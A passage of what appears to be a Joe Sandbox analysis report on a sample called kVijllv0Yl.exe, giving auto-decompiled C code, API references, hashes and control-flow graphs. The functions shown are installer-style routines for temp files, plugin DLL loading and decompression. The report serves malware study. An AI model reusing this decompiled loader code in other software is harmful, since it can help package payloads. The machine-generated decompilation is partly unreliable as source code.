                  				return _t14 | 0xffffffff;
                  			}

                  APIs
                  • GetTickCount.KERNEL32 ref: 00403041
                    • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                  • WriteFile.KERNELBASE(0040B038,0040C569,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
                  • SetFilePointer.KERNELBASE(00041E52,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: File$Pointer$CountTickWrite
                  • String ID: 80A
                  • API String ID: 2146148272-195308239
                  • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                  • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                  • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                  • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  control_flow_graph 570 401f51-401f5d 571 401f63-401f79 call 4029e8 * 2 570->571 572 40200b-40200d 570->572 581 401f88-401f96 LoadLibraryExA 571->581 582 401f7b-401f86 GetModuleHandleA 571->582 573 402156-40215b call 401423 572->573 580 40287d-40288c 573->580 585 401f98-401fa6 GetProcAddress 581->585 586 402004-402006 581->586 582->581 582->585 587 401fe5-401fea call 404e23 585->587 588 401fa8-401fae 585->588 586->573 592 401fef-401ff2 587->592 590 401fb0-401fbc call 401423 588->590 591 401fc7-401fde call 735e1000 588->591 590->592 598 401fbe-401fc5 590->598 596 401fe0-401fe3 591->596 592->580 594 401ff8-401fff FreeLibrary 592->594 594->580 596->592 598->592
                  C-Code - Quality: 57%
                  			E00401F51(void* __ebx, void* __eflags) {
                  				struct HINSTANCE__* _t18;
                  				struct HINSTANCE__* _t25;
                  				void* _t26;
                  				struct HINSTANCE__* _t29;
                  				CHAR* _t31;
                  				intOrPtr* _t32;
                  				void* _t33;
                  
                  				_t26 = __ebx;
                  				asm("sbb eax, 0x423f58");
                  				 *(_t33 - 4) = 1;
                  				if(__eflags < 0) {
                  					_push(0xffffffe7);
                  					L14:
                  					E00401423();
                  					L15:
                  					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
                  					return 0;
                  				}
                  				_t31 = E004029E8(0xfffffff0);
                  				 *(_t33 + 8) = E004029E8(1);
                  				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                  					L3:
                  					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
                  					_t29 = _t18;
                  					if(_t29 == _t26) {
                  						_push(0xfffffff6);
                  						goto L14;
                  					}
                  					L4:
                  					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                  					if(_t32 == _t26) {
                  						E00404E23(0xfffffff7,  *(_t33 + 8));
                  					} else {
                  						 *(_t33 - 4) = _t26;
                  						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                  							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
                  						} else {
                  							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                  							if( *_t32() != 0) {
                  								 *(_t33 - 4) = 1;
                  							}
                  						}
                  					}
                  					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                  						FreeLibrary(_t29);
                  					}
                  					goto L15;
                  				}
                  				_t25 = GetModuleHandleA(_t31); // executed
                  				_t29 = _t25;
                  				if(_t29 != __ebx) {
                  					goto L4;
                  				}
                  				goto L3;
                  			}











                  APIs
                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                    • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                    • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                  • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                  • String ID: ?B
                  • API String ID: 2987980305-117478770
                  • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                  • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                  • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                  • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 600 4015b3-4015c6 call 4029e8 call 40560c 605 4015c8-4015e3 call 4055a3 CreateDirectoryA 600->605 606 40160a-40160d 600->606 615 401600-401608 605->615 616 4015e5-4015f0 GetLastError 605->616 607 40162d-40215b call 401423 606->607 608 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 606->608 622 40287d-40288c 607->622 608->622 615->605 615->606 619 4015f2-4015fb GetFileAttributesA 616->619 620 4015fd 616->620 619->615 619->620 620->615
                  C-Code - Quality: 85%
                  			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                  				struct _SECURITY_ATTRIBUTES** _t10;
                  				int _t19;
                  				struct _SECURITY_ATTRIBUTES* _t20;
                  				signed char _t22;
                  				struct _SECURITY_ATTRIBUTES* _t23;
                  				CHAR* _t25;
                  				struct _SECURITY_ATTRIBUTES** _t29;
                  				void* _t30;
                  
                  				_t23 = __ebx;
                  				_t25 = E004029E8(0xfffffff0);
                  				_t10 = E0040560C(_t25);
                  				_t27 = _t10;
                  				if(_t10 != __ebx) {
                  					do {
                  						_t29 = E004055A3(_t27, 0x5c);
                  						 *_t29 = _t23;
                  						 *((char*)(_t30 + 0xb)) =  *_t29;
                  						_t19 = CreateDirectoryA(_t25, _t23); // executed
                  						if(_t19 == 0) {
                  							if(GetLastError() != 0xb7) {
                  								L4:
                  								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                  							} else {
                  								_t22 = GetFileAttributesA(_t25); // executed
                  								if((_t22 & 0x00000010) == 0) {
                  									goto L4;
                  								}
                  							}
                  						}
                  						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                  						 *_t29 = _t20;
                  						_t27 =  &(_t29[0]);
                  					} while (_t20 != _t23);
                  				}
                  				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                  					_push(0xfffffff5);
                  					E00401423();
                  				} else {
                  					E00401423(0xffffffe6);
                  					E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t25);
                  					SetCurrentDirectoryA(_t25); // executed
                  				}
                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                  				return 0;
                  			}












                  APIs
                    • Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,747DF560,004053BE,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,747DF560), ref: 0040561A
                    • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                    • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                  • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                  Strings
                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                  • String ID: C:\Users\user\AppData\Local\Temp
                  • API String ID: 3751793516-1104044542
                  • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                  • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                  • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                  • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 625 40578b-405795 626 405796-4057c0 GetTickCount GetTempFileNameA 625->626 627 4057c2-4057c4 626->627 628 4057cf-4057d1 626->628 627->626 629 4057c6 627->629 630 4057c9-4057cc 628->630 629->630
                  C-Code - Quality: 100%
                  			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
                  				signed int _t11;
                  				int _t14;
                  				signed int _t16;
                  				void* _t19;
                  				CHAR* _t20;
                  
                  				_t20 = _a4;
                  				_t19 = 0x64;
                  				while(1) {
                  					_t19 = _t19 - 1;
                  					_a4 = 0x61736e;
                  					_t11 = GetTickCount();
                  					_t16 = 0x1a;
                  					_a6 = _a6 + _t11 % _t16;
                  					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                  					if(_t14 != 0) {
                  						break;
                  					}
                  					if(_t19 != 0) {
                  						continue;
                  					}
                  					 *_t20 =  *_t20 & 0x00000000;
                  					return _t14;
                  				}
                  				return _t20;
                  			}









                  APIs
                  • GetTickCount.KERNEL32 ref: 0040579E
                  • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CountFileNameTempTick
                  • String ID: "C:\Users\user\Desktop\kVijllv0Yl.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                  • API String ID: 1716503409-262396425
                  • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                  • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                  • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                  • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 021B0990
                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: c904e8f7e3297663f87b7f88d02aaa80f4ad121676cd8b6bf9975e10d12a04e7
                  • Instruction ID: 598357265ac14edbbbe1cf5c2f7bd5e061478e6b12f6935d9f69644e17175251
                  • Opcode Fuzzy Hash: c904e8f7e3297663f87b7f88d02aaa80f4ad121676cd8b6bf9975e10d12a04e7
                  • Instruction Fuzzy Hash: AC711935E90348EEDB51DBE4E951BEEB7B6AF48710F208416E619FA2A0E7700E41DF05
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 84%
                  			E004031F1(void* __eflags) {
                  				void* _t2;
                  				void* _t5;
                  				CHAR* _t6;
                  
                  				_t6 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                  				E00405CE3(_t6);
                  				_t2 = E004055E5(_t6);
                  				if(_t2 != 0) {
                  					E00405578(_t6);
                  					CreateDirectoryA(_t6, 0); // executed
                  					_t5 = E0040578B("1033", _t6); // executed
                  					return _t5;
                  				} else {
                  					return _t2;
                  				}
                  			}







                  APIs
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                    • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                  • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Char$Next$CreateDirectoryPrev
                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                  • API String ID: 4115351271-3512041753
                  • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                  • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                  • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                  • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 99%
                  			E00406481() {
                  				signed int _t530;
                  				void _t537;
                  				signed int _t538;
                  				signed int _t539;
                  				unsigned short _t569;
                  				signed int _t579;
                  				signed int _t607;
                  				void* _t627;
                  				signed int _t628;
                  				signed int _t635;
                  				signed int* _t643;
                  				void* _t644;
                  
                  				L0:
                  				while(1) {
                  					L0:
                  					_t530 =  *(_t644 - 0x30);
                  					if(_t530 >= 4) {
                  					}
                  					 *(_t644 - 0x40) = 6;
                  					 *(_t644 - 0x7c) = 0x19;
                  					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                  					while(1) {
                  						L145:
                  						 *(_t644 - 0x50) = 1;
                  						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                  						while(1) {
                  							L149:
                  							if( *(_t644 - 0x48) <= 0) {
                  								goto L155;
                  							}
                  							L150:
                  							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                  							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                  							 *(_t644 - 0x54) = _t643;
                  							_t569 =  *_t643;
                  							_t635 = _t569 & 0x0000ffff;
                  							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                  							if( *(_t644 - 0xc) >= _t607) {
                  								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                  								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                  								_t628 = _t627 + 1;
                  								 *_t643 = _t569 - (_t569 >> 5);
                  								 *(_t644 - 0x50) = _t628;
                  							} else {
                  								 *(_t644 - 0x10) = _t607;
                  								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                  								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                  							}
                  							if( *(_t644 - 0x10) >= 0x1000000) {
                  								L148:
                  								_t487 = _t644 - 0x48;
                  								 *_t487 =  *(_t644 - 0x48) - 1;
                  								L149:
                  								if( *(_t644 - 0x48) <= 0) {
                  									goto L155;
                  								}
                  								goto L150;
                  							} else {
                  								L154:
                  								L146:
                  								if( *(_t644 - 0x6c) == 0) {
                  									L169:
                  									 *(_t644 - 0x88) = 0x18;
                  									L170:
                  									_t579 = 0x22;
                  									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                  									_t539 = 0;
                  									L172:
                  									return _t539;
                  								}
                  								L147:
                  								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                  								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                  								_t484 = _t644 - 0x70;
                  								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                  								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                  								goto L148;
                  							}
                  							L155:
                  							_t537 =  *(_t644 - 0x7c);
                  							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                  							while(1) {
                  								L140:
                  								 *(_t644 - 0x88) = _t537;
                  								while(1) {
                  									L1:
                  									_t538 =  *(_t644 - 0x88);
                  									if(_t538 > 0x1c) {
                  										break;
                  									}
                  									L2:
                  									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
                  										case 0:
                  											L3:
                  											if( *(_t644 - 0x6c) == 0) {
                  												goto L170;
                  											}
                  											L4:
                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                  											_t538 =  *( *(_t644 - 0x70));
                  											if(_t538 > 0xe1) {
                  												goto L171;
                  											}
                  											L5:
                  											_t542 = _t538 & 0x000000ff;
                  											_push(0x2d);
                  											asm("cdq");
                  											_pop(_t581);
                  											_push(9);
                  											_pop(_t582);
                  											_t638 = _t542 / _t581;
                  											_t544 = _t542 % _t581 & 0x000000ff;
                  											asm("cdq");
                  											_t633 = _t544 % _t582 & 0x000000ff;
                  											 *(_t644 - 0x3c) = _t633;
                  											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                  											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                  											_t641 = (0x300 << _t633 + _t638) + 0x736;
                  											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                  												L10:
                  												if(_t641 == 0) {
                  													L12:
                  													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                  													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                  													goto L15;
                  												} else {
                  													goto L11;
                  												}
                  												do {
                  													L11:
                  													_t641 = _t641 - 1;
                  													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                  												} while (_t641 != 0);
                  												goto L12;
                  											}
                  											L6:
                  											if( *(_t644 - 4) != 0) {
                  												GlobalFree( *(_t644 - 4));
                  											}
                  											_t538 = GlobalAlloc(0x40, 0x600); // executed
                  											 *(_t644 - 4) = _t538;
                  											if(_t538 == 0) {
                  												goto L171;
                  											} else {
                  												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                  												goto L10;
                  											}
                  										case 1:
                  											L13:
                  											__eflags =  *(_t644 - 0x6c);
                  											if( *(_t644 - 0x6c) == 0) {
                  												L157:
                  												 *(_t644 - 0x88) = 1;
                  												goto L170;
                  											}
                  											L14:
                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                  											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                  											_t45 = _t644 - 0x48;
                  											 *_t45 =  *(_t644 - 0x48) + 1;
                  											__eflags =  *_t45;
                  											L15:
                  											if( *(_t644 - 0x48) < 4) {
                  												goto L13;
                  											}
                  											L16:
                  											_t550 =  *(_t644 - 0x40);
                  											if(_t550 ==  *(_t644 - 0x74)) {
                  												L20:
                  												 *(_t644 - 0x48) = 5;
                  												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                  												goto L23;
                  											}
                  											L17:
                  											 *(_t644 - 0x74) = _t550;
                  											if( *(_t644 - 8) != 0) {
                  												GlobalFree( *(_t644 - 8));
                  											}
                  											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                  											 *(_t644 - 8) = _t538;
                  											if(_t538 == 0) {
                  												goto L171;
                  											} else {
                  												goto L20;
                  											}
                  										case 2:
                  											L24:
                  											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                  											 *(_t644 - 0x84) = 6;
                  											 *(_t644 - 0x4c) = _t557;
                  											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                  											goto L132;
                  										case 3:
                  											L21:
                  											__eflags =  *(_t644 - 0x6c);
                  											if( *(_t644 - 0x6c) == 0) {
                  												L158:
                  												 *(_t644 - 0x88) = 3;
                  												goto L170;
                  											}
                  											L22:
                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                  											_t67 = _t644 - 0x70;
                  											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                  											__eflags =  *_t67;
                  											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                  											L23:
                  											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                  											if( *(_t644 - 0x48) != 0) {
                  												goto L21;
                  											}
                  											goto L24;
                  										case 4:
                  											L133:
                  											_t559 =  *_t642;
                  											_t626 = _t559 & 0x0000ffff;
                  											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                  											if( *(_t644 - 0xc) >= _t596) {
                  												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                  												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                  												 *(_t644 - 0x40) = 1;
                  												_t560 = _t559 - (_t559 >> 5);
                  												__eflags = _t560;
                  												 *_t642 = _t560;
                  											} else {
                  												 *(_t644 - 0x10) = _t596;
                  												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                  												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                  											}
                  											if( *(_t644 - 0x10) >= 0x1000000) {
                  												goto L139;
                  											} else {
                  												goto L137;
                  											}
                  										case 5:
                  											L137:
                  											if( *(_t644 - 0x6c) == 0) {
                  												L168:
                  												 *(_t644 - 0x88) = 5;
                  												goto L170;
                  											}
                  											L138:
                  											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                  											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                  											L139:
                  											_t537 =  *(_t644 - 0x84);
                  											L140:
                  											 *(_t644 - 0x88) = _t537;
                  											goto L1;
                  										case 6:
                  											L25:
                  											__edx = 0;
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												L36:
                  												__eax =  *(__ebp - 4);
                  												__ecx =  *(__ebp - 0x38);
                  												 *(__ebp - 0x34) = 1;
                  												 *(__ebp - 0x84) = 7;
                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                  												goto L132;
                  											}
                  											L26:
                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                  											__esi =  *(__ebp - 0x60);
                  											__cl = 8;
                  											__cl = 8 -  *(__ebp - 0x3c);
                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                  											__ecx =  *(__ebp - 0x3c);
                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                  											__ecx =  *(__ebp - 4);
                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
